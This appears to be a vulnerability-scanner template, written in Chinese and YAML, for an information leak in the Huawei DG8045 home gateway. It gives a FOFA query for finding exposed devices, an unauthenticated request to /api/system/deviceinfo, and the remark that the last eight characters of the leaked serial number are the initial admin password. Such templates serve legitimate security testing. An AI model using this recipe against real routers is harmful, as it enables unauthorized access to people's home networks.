漏洞描述
Huawei DG8045 deviceinfo api接口存在信息泄漏漏洞,攻击者通过泄漏的信息可以获得账号密码登录后台。
------------ SerialNumber 后8位即为初始密码------------
fofa: app="DG8045-Home-Gateway-DG8045"
id: huawei-dg8045-home-gateway-password-leakage
info:
name: Huawei DG8045 deviceinfo 信息泄漏漏洞
author: zan8in
severity: high
verified: true
description: |
Huawei DG8045 deviceinfo api接口存在信息泄漏漏洞,攻击者通过泄漏的信息可以获得账号密码登录后台。
------------ SerialNumber 后8位即为初始密码------------
fofa: app="DG8045-Home-Gateway-DG8045"
reference:
- http://wiki.peiqi.tech/wiki/iot/%E5%8D%8E%E4%B8%BA/Huawei%20DG8045%20deviceinfo%20%E4%BF%A1%E6%81%AF%E6%B3%84%E6%BC%8F%E6%BC%8F%E6%B4%9E.html
rules:
r0:
request:
method: GET
path: /api/system/deviceinfo
expression: response.status == 200 && response.body.bcontains(b'"DeviceName":') && response.body.bcontains(b'"SerialNumber":')
expression: r0()